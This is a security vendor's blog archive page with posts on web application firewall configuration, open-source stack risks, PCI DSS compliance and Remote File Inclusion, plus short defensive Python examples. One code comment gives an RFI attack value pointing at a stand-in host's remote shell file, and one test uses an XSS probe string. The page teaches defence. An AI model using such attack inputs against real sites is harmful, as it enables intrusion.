-Saumil

No Comments »

To “Open Source” or “Not to Open Source”

Posted: July 17th, 2012
Filed under: Web and Application Security
Tags: , , , , , ,


In the IT world, “To Open Source or Not to Open Source” is a perennial debate. While traveling last year, I came across many large global financial institutions that are adopting open source as the strategy for all future solutions. Adoption of open source technology is a good strategy, especially given the complex licensing regimes practiced by many large software vendors. But while security bears upon the decision, not many fully understand how to take care of security concerns when operationalizing an “Open Source Stack” strategy.

In recent times we have been called in to test many applications that are based on open source applications or a complete open source stack. Testing these applications has given us some valuable insights to consider when going the open source way. Before I discuss them, let me highlight that very rarely is an open source product used as-is. In most instances, the product undergoes heavy customization, including the installation of many extensions. In light of this, our tests revealed two very important insights.

One: many open source products have add-ons, extensions, plug-ins, etc., which make them attractive in many ways. While the core application itself is mostly secure, it is these extensions and plug-ins, contributed by many diverse developers and organizations, that introduce vulnerabilities into the open source product as a whole. The graph below shows the number of vulnerabilities introduced in Joomla, a very popular open source CMS, between 2005 and 2011.

Open source vulnerabilities

While the graph may shock you, it is not actually surprising, since Joomla has more than 1700 extensions and add-on modules. While many of the vulnerabilities may since have been fixed, our recommendation is to select only those extensions that have no known vulnerabilities.

Two: all our tests have revealed that the customizations done during implementation introduce new vulnerabilities. Expecting fewer vulnerabilities simply because customization involves limited coding is a fallacy.

Conclusion: Conducting a thorough Vulnerability Assessment and Source Code Review is even more vital when implementing open source products to cover your bases against any vulnerability introduced or already present but unknown. But this should not deter you from taking a strategic call on adoption of open source technologies. With the right security partner, you should be able to get the strategic advantages of Open Source, whether that be cost savings or risk mitigation! Until next time, stay safe!

-Hiren Shah, Net-Square Solutions

Follow Hiren’s views on Twitter @hiren_sh or on his blog.

No Comments »

How to Use a Web Application Firewall (The Right Way)

Posted: May 8th, 2012
Filed under: IIS & HTTP, Web and Application Security


The Perceptions of Web Application Firewalls

Difficult to configure. Confusing to use. Time-consuming to manage. Set-it-and-forget-it security. These are some of the perceptions of Web application firewalls that can be, in many cases, dangerous to the security health of your organization. Like physical exercise, exercising good security practices requires effort and commitment, but at the end of the day, the benefits far outweigh the costs. This may be news to some, but a Web app firewall is not a set-it-and-forget-it security crutch. Rather, a Web app firewall is a security tool that requires dedicated use. Most importantly, the Web application firewall isn’t a sentient being, it’s a device that, like many of man’s creations, is only as good as the person or people wielding it.

A State of Mind

Security is never a feature you can outright purchase. It’s not a box you can check, or a test you can pass and be done with. This rationale applies to security whether it be for a car, a home, or your Web apps. This is a concept most people can grasp in more physical, trivial day-to-day tasks, but it is sometimes lost when it comes to the Web. For example, driving to and from work is potentially very dangerous. However, if you practice, get your license, and drive with caution, while avoiding activities like speeding and texting while driving, you will, in all likelihood, be safe. No one would get into the driver’s seat of a car for the first time and expect passive safety features like a seat belt and airbag to make up for their lack of experience. The same applies to Web app firewalls: there are measures of practice that must be applied in order to achieve security; one cannot rely solely upon passive features to do all the work. Web app firewall users need to be active drivers, not passive ones. Here are some tips to help you keep an information security state of mind and become an active Web app firewall driver.

Think in Layers

Don’t: Put up only a single obstacle to prevent vulnerability exploits.
Do: Use a Web app firewall as one layer in a multi-layered wall.
Why: Most code in applications isn’t perfect (really, none of it is, and even if it were, an attacker could still find legitimate paths of entry using valid authorization credentials). This means there are flaws that can be exploited by attackers. However, flaws and vulnerabilities often cannot be easily recognized or fixed. Security should be thought of in layers, with each layer serving its own purpose and no single layer being responsible for the entire load. Think of home security: you may have a fence, locks on your doors, and an alarm. A WAF should constitute only a single layer in a larger defense scheme.
How: A Defense in Depth strategy. This type of strategy aims to create a series of backup measures in case one layer fails, which allows each security tool to perform within its functional specifications and not put the entire job of security on one layer. This strategy can also be thought of as a funnel, with broader measures at the top leading down to the most specific security functionality at the base, in the form of a Web app firewall.

Firewall

Block traffic going to all ports other than Ports 80 and 443. This will funnel traffic into those two ports for inspection by the other layers of security behind it. Wendy Nather wrote a piece on why we still need firewalls that nicely explains their usefulness.

IDS

Detection is needed to alert a system admin if and when an intruder is recognized in the application. Being aware of an intruder’s existence inside the app allows a potential attack to be identified before it has commenced. This gives a system admin time to take additional preventative measures, such as blocking the IP or logging off a user account if it’s been taken over. An IDS provides a more general detection solution that alerts when intrusions occur at the network and system levels, not specifically within an application, as an app firewall would.

IPS

An intrusion prevention system will prevent an attacker from gathering information on your app and server. It’s essential to prevent hacker reconnaissance by obfuscating information like server type, file extensions, and application or site errors so it is not easily accessible to hackers. This is again a more system- and network-level approach.

Application firewall

Finally, your applications will require an app firewall to secure them specifically, as they are valuable centers of information with large amount of traffic going in and out. A Web app firewall can monitor, detect, and prevent malicious traffic accessing applications.  With active usage, a Web app firewall will act as a powerful last line of defense for your Web apps against attacks.

Shrink Wrap Your Security

Don’t: Expect a WAF to be correctly configured for your site out of the box.
Do: Set up your Web application firewall for your specific needs.
Why: Shrink-wrapping a Web app firewall’s security to fit tightly around your specific requirements leaves less room for error. Relying only on a blacklist of attack signatures is a good way to get hit by a Zero Day, while an overly strict whitelist can lead to false positives.
How: Set app specific policies that only allow an app to be used the way it was intended. Any vulnerabilities found through penetration testing that cannot be easily remediated should have app firewall policies put in place to protect until corrections can be made to the vulnerable code. Setting some of the below policies in your Web app firewall is a good start to shrink wrapping security.

Input validation. Configuring a Web app firewall’s input validation policies will help protect against attacks like SQL injection and cross site scripting (XSS). Platform-specific exploits can use complex URL strings to gain access to a shell or a Common Gateway Interface (CGI), from which a hacker can easily get a directory listing revealing file structure. Input sanitizing prevents harmful scripts from being injected into your app through URLs or form fields and should be enabled on an app firewall. It should be configured according to the characters permitted and needed in each individual field.
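To make the field-by-field idea concrete, here is a minimal Python sketch of whitelist-style input validation. The field names and character rules are hypothetical examples, not actual ServerDefender VP configuration; a WAF applies the same principle declaratively.

```python
import re

# Hypothetical per-field whitelist rules: each field admits only the
# characters it actually needs, mirroring the policy described above.
FIELD_RULES = {
    "username": re.compile(r"^[A-Za-z0-9_]{3,20}$"),
    "zip_code": re.compile(r"^\d{5}$"),
    "comment":  re.compile(r"^[\w\s.,!?'-]{1,500}$"),
}

def validate(field: str, value: str) -> bool:
    """Accept a value only if it matches the field's whitelist."""
    rule = FIELD_RULES.get(field)
    return bool(rule and rule.fullmatch(value))

print(validate("username", "alice_99"))                   # True
print(validate("comment", "<script>alert(1)</script>"))   # False: angle brackets rejected
```

Note that the comment rule rejects script injection not by recognizing attack signatures but simply by never admitting `<` or `>`, which is why whitelisting ages better than blacklisting.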

Use different configurations. Like customizing input sanitizing, if you need to secure – for example – an Exchange server and a Joomla site, do not use the same configuration for both. Just as a house with no windows will need different security than a glass house, different Web apps will have their own security needs that should be addressed independently.

Manage file uploads. If users can upload files, only allow the file types your site uses. This means things like preventing dynamic files from being uploaded if your site only hosts images. A Web app firewall should be configured to block any attempt to upload files that your app or site does not use. Be sure to be as specific as possible by either whitelisting only what you will use, or blacklisting all file types that you cannot use.
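A minimal Python sketch of that file-type whitelist; the allowed extension set is a hypothetical example for an image-only upload form.

```python
import os

# Hypothetical whitelist for a site that only hosts images.
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}

def upload_allowed(filename: str) -> bool:
    # os.path.splitext takes the *last* extension, so "shell.php.jpg"
    # still ends in .jpg -- pair this check with content inspection.
    ext = os.path.splitext(filename)[1].lower()
    return ext in ALLOWED_EXTENSIONS

print(upload_allowed("vacation.PNG"))  # True
print(upload_allowed("shell.php"))     # False: dynamic file rejected
```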

Be wary of session hijacking. Set user sessions to time out when idle for an extended period. This will help prevent a user’s session from being hijacked, leading to unauthorized access to sensitive information. Policies can also be enforced so a session can only be used from a single IP address, preventing an outside hacker (with a different IP) from gaining access to the legitimate user’s session.

Request management. You know the areas of your site or app where sensitive data can be accessed, the types of sensitive data, and the types of files your site is composed of. Make sure access to admin URLs is restricted and that requests for sensitive files from untrusted users are blocked by your Web app firewall.

Without security measures in place, hackers will find vulnerable penetration vectors in your Web applications. Imagine your site as a bank; there are ordinary locks and alarms on the perimeter doors, but the valuable goods (money, etc.) are inside a vault. Since you know your Web applications best, it’s up to you to make sure you place locks on all the doors, and make sure you put bigger locks on the more important doors. If you’re unsure what needs to be secured, thoroughly scrutinize and pentest your site.

 

You’re Never Done Securing

Even after you’ve configured your Web application firewall perfectly and put in place the best security policies you can, there are dangers to be aware of.  Human error, trust betrayal, and organizational challenges pose security threats that are hard to defend against, but are important to evaluate as they pertain to your organization.

Denial of Service (DoS). Made popular by its presence in the media as the attack method of choice for hacktivist groups, denial of service (DoS) attacks have become a major concern for many organizations, and rightly so. DoS attacks rely on a large number of requests to bring down a target site or app. Casual DoS attacks can be mitigated with a Web application firewall by limiting the number of requests per second or blocking IP addresses with high request frequencies. If you are dealing with serious and determined DoS attacks, however, you may want to perform a risk assessment and investigate cloud-scale countermeasures, which will require some organizational backing to make the necessary changes.
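The per-second request limiting described above can be sketched as a sliding-window counter per IP. This Python example is illustrative only; the threshold is a hypothetical value, not a recommended setting.

```python
from collections import defaultdict, deque

MAX_REQUESTS = 100   # hypothetical per-IP budget
WINDOW = 1.0         # seconds

hits: dict[str, deque] = defaultdict(deque)

def allow(ip: str, now: float) -> bool:
    """Admit a request only if this IP is under budget for the window."""
    q = hits[ip]
    while q and now - q[0] > WINDOW:
        q.popleft()              # drop timestamps outside the window
    if len(q) >= MAX_REQUESTS:
        return False             # over budget: drop or block the IP
    q.append(now)
    return True

# 150 requests arriving 1 ms apart from one IP: only 100 get through.
results = [allow("198.51.100.9", i * 0.001) for i in range(150)]
print(results.count(True))  # 100
```

A real WAF would layer an outright block on IPs that repeatedly exceed the budget, rather than refusing requests one at a time.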

Zero Day. Zero-day attacks are attacks that exploit previously unknown vulnerabilities. Even if you have tested against every known exploit and secured against them, new vulnerability exploits will arise that you are not protected against. Any attack, even known attack types like SQL injection or cross site scripting, can become a major threat if it’s a zero-day exploit. New exploits are created every day and can be very damaging, though a Web app firewall can be used to preempt them. When purchasing a Web app firewall, make sure it has a strategy for dealing with unknown exploits, or a methodology for handling attacks it hasn’t seen before. Even with an app firewall in place, it’s important to remember that security today doesn’t mean you won’t be vulnerable tomorrow.

Exploiting Legitimate Trust Relationships. Web app firewalls and security policies can go a long way toward securing an organization, but exploitation of trust relationships, whether intentional or unintentional, is hard to defend against. Members of an organization must be intelligent and prudent about their Web use for the organization to remain secure. This means not opening attachments from unknown senders, not clicking on strange links from unknown and untrusted people, and so on. For example, if a user unknowingly downloads a keystroke logger from an untrusted email correspondent, a hacker can simply lift credentials from the logger and gain legitimate access to an organization’s system, with no SQL injection, session hijacking, or complex hacking techniques required. This example brings to light the human element of Web security: an organization is only as safe as its least secure link.

Test, Update, and Evaluate

Don’t: Keep security static, perform only one round of penetration testing or auditing, or use being PCI compliant as an excuse not to perform further testing.
Do: Test and audit regularly. Evolve your security plan as threats and traffic trends on your site change.
Why: Security vulnerabilities can arise after a code change, an update or through a new hacking method. Nothing is ever static; the Web is constantly changing, which means that security needs to stay current with changes that occur. New vulnerabilities are discovered all the time, even in major software companies’ code.
How: Stay current with patches and updates; people spend hours developing these for a reason. Stay informed by reading about information security trends, following #infosec on Twitter, talking to peers, and so on. Regularly pentest and audit your apps and sites. Analyze logs and learn from them to make adjustments to your Web app firewall configuration.

Log. When first setting up a WAF, use a logging mode to evaluate your site’s traffic. This will give you a sense of where tighter policies may need to be set or where exceptions may need to be set.

Check for false positives. False positives are bad for business. You never want to block a legitimate and harmless user who accidentally mistyped a URL or input incorrect characters into a field because security policies are set too tightly. Logs should be checked regularly for errors that aren’t really errors, and exceptions should be added to policies that may be producing false positives.

Perform tests. Penetration testing for vulnerabilities in your code will show you what you need to protect against until new code can be deployed to fix it.  Set new policies in your app firewall based on your testing.

Update and patch. Install updates as they are released. Deploy patches to secure vulnerable code; it doesn’t matter if the patch is out if you don’t actually apply it. If there is an update or patch available to fix a vulnerability, chances are there are people who know how to exploit it.

Web app firewalls can be a useful ally toward greater Web security for those who know how to use them properly.  Whether you’re in the market for a new Web app firewall, or are already a proud owner, understanding that a Web app firewall is a tool designed to be driven is an important step toward increased Web security.

No Comments »

2011 Web Security Statistics and How to Avoid Being a Victim in 2012

Posted: February 27th, 2012
Filed under: IIS & HTTP, Web and Application Security
Tags: , , , , , , ,


 

The More We Know, The Better We Can Prepare

The landscape of web security is constantly changing, with hacking attacks growing more prevalent and diverse. Our job is to constantly evaluate that ever-changing landscape so we can stay one step ahead and be prepared in the event of an attack. Here are some resources from around the web to keep you informed, prepared, and – most importantly – secure.

2011 Data Breach Investigations Report

2011 saw the all-time lowest amount of compromised data, but also the highest number of incidents ever investigated. Among the most common hacking methods for 2011 were brute force and dictionary attacks, SQL injection, and buffer overflow. Web applications were the most attacked pathway when hospitality and retail victims were removed from the data set, and suffered more numerous attacks than ever.

Read the Report>

Web Application Firewalls can help protect your business from attack. Keeping harmful traffic out and letting good traffic in is crucial to running a business online, just as it is to running a brick-and-mortar business. With attacks evolving and becoming more and more prevalent, a blacklist of signatures is no longer enough to secure web apps. They need protection against threats both known and unknown.

Intrusion Detection FAQ>

Writing an Information Security Policy

An Information Security Policy is the cornerstone of an Information Security Program. It should reflect the organization’s objectives for security and the agreed upon management strategy for securing information.

In order to be useful in providing authority to execute the remainder of the Information Security Program, it must also be formally agreed upon by executive management. This means that, in order to compose an information security policy document, an organization has to have well-defined objectives for security and an agreed-upon management strategy for securing information.

How to Write an Information Security Policy>

Selecting a Web Application Firewall

OWASP, the authority on web security, recommends the following criteria for selecting your Web Application Firewall.

  • Protection Against OWASP Top Ten!
  • Very Few False Positives (i.e., should NEVER disallow an authorized request)
  • Strength of Default (Out of the Box) Defenses
  • Power and Ease of Learn Mode
  • Types of Vulnerabilities it can prevent.
  • Detects disclosure and unauthorized content in outbound reply messages, such as credit-card and Social Security numbers.
  • Both Positive and Negative Security model support.
  • Simplified and Intuitive User Interface.
  • Cluster mode support.
  • High Performance (milliseconds latency).
  • Complete Alerting, Forensics, Reporting capabilities.
  • Web Services/XML support.
  • Brute Force protection.
  • Ability to run in Active (block and log), Passive (log only), and Bypass modes for web traffic.
  • Ability to keep individual users constrained to exactly what they have seen in the current session
  • Ability to be configured to prevent ANY specific problem (i.e., Emergency Patches)
No Comments »

PCI DSS Compliance Matters

Posted: February 27th, 2012
Filed under: Around the Web, Web and Application Security
Tags: , , , , , ,


In 2011, 89% of organizations with payment card data loss were not Payment Card Industry Data Security Standard compliant at the time of the security breach.  These types of breaches can lead to monetary loss for the customer and for a company; in the case of the former, there is also the possibility of reputation loss – which may be a far worse and lasting negative effect.

Ten Ways to Avoid Costly PCI Compliance Violations

The first tip for avoiding costly PCI Compliance violations (in the above piece) is familiarization with the requirements themselves.  With the complexity and severity of security breaches always growing, it is crucial to know and understand the security standards required to store, transmit, or process payment cardholder data.  While the 75-page PCI DSS “Requirements and Security Assessment Procedures” document may be somewhat daunting in its requests and exhaustive calls for implementation, it can be simplified to:

  • Build and Maintain a Secure Network
  • Protect Cardholder Data
  • Maintain a Vulnerability Management Program
  • Implement Strong Access Control Measures
  • Regularly Monitor and Test Networks
  • Maintain an Information Security Policy

When you break down these main categories, there are 12 provisions to achieve PCI DSS compliance.   Not only are these requisite provisions for PCI Compliance, but they are a great template for security for any type of business.

Getting Started with the PCI Data Security Standard>>>

A while back we posted the following PCI quick tips, which are still applicable:

Do:

  • Encrypt cardholder data.
  • Use products that are approved for the PCI standard.
  • Understand the concept of compensating controls.
  • Organize PCI compliance as an on-going, cross-functional project–not as a one-time event.
  • Understand your cardholder information business process from end to end.
  • Take the time to read and understand the PCI Data Security Standard.

Don’t:

  • Store unnecessary cardholder data beyond receiving the authorization code.
  • Be lulled into thinking that you would not be a target for criminals.
  • Try to create your own crypto solutions.
  • Assume your vendor is protecting you.

Through all the preparation and planning, let’s not forget that PCI DSS does not make a company immune from attack.  It can and does still happen – after all, a determined hacker can bypass almost any security.  This is why PCI DSS compliance, and security as a whole, must be treated as an ongoing process, with a time investment in line with how much your company values staying in business.

 

No Comments »

Thoughts On Defensive Development for Sitecore

Posted: February 25th, 2012
Filed under: Web and Application Security
Tags: , , , , , , ,


Recently, Port80’s Joe Lima and Thomas Powell presented a talk on Web Application Security for Sitecore.  If you run Sitecore, you are a perfect candidate for ServerDefender VP!

The presentation can be viewed on Slideshare below.

 

Thoughts on Defensive Web Development - Sitecore


No Comments »

All Your Web Sites Are Belong to Us

Posted: September 15th, 2010
Filed under: Web and Application Security


Remote File Inclusion: how the bad guys take control

Remote File Inclusion (RFI) is a type of vulnerability that allows an attacker to include a remote file, usually through a script, on the target Web server. RFI occurs due to the use of user-supplied input without proper validation. This can lead to something as minimal as outputting the contents of a file, but depending on the severity it can lead to much worse, including: Read the rest of this entry »
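One common defense against RFI is to never use the raw request parameter as a path or URL, but to map it through an allowlist of known local files. A minimal Python sketch of that idea, with hypothetical template names:

```python
# RFI sketch: instead of passing user input straight into an include
# (e.g. ?page=http://evil.example/shell.txt), resolve it through an
# allowlist of known local templates. Names here are hypothetical.
TEMPLATES = {
    "home":    "templates/home.html",
    "about":   "templates/about.html",
    "contact": "templates/contact.html",
}

def resolve_page(user_value: str) -> str:
    # Unknown keys fall back to a safe default; the raw value is never
    # interpreted as a filesystem path or a URL.
    return TEMPLATES.get(user_value, TEMPLATES["home"])

print(resolve_page("about"))                          # templates/about.html
print(resolve_page("http://evil.example/shell.txt"))  # templates/home.html
```

Because the attacker-controlled string only ever selects among fixed dictionary keys, there is no input the attacker can supply that causes a remote or unintended local file to be included.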

No Comments »

Preparing for New PCI Standards

Posted: August 16th, 2010
Filed under: Web and Application Security
Tags: , , , , , ,


According to CSP Daily News, the PCI Security Standards Council has just introduced the plan for Version 2.0 of its PCI standards, which are due to take effect in October of 2010.

Version 2.0 of PCI DSS and PA-DSS do not introduce any new major requirements. Key updates, clarifications and guidance include: Read the rest of this entry »

No Comments »